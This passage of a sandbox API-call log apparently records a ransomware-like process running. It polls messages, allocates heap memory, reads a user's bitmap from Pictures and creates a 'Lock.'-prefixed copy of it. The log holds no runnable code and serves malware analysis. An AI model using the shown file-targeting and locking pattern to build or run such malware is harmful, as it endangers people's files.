Flags=0x0, Size=0x10) returned 0x24a9570 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/waKMSqrywnXqjmY3STm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wakmsqrywnxqjmy3stm.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0256.911] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.911] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0256.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0256.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.waKMSqrywnXqjmY3STm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.wakmsqrywnxqjmy3stm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0256.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.913] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.913] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0256.914] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0256.917] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x1565, lpOverlapped=0x0) returned 1 [0256.918] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0256.919] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11565) returned 0x34b2250 [0256.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.920] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0256.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11565) returned 0x34b2250 [0256.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0256.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11565) returned 0x24b7a48 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.925] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.925] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.925] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.926] HeapFree (in: 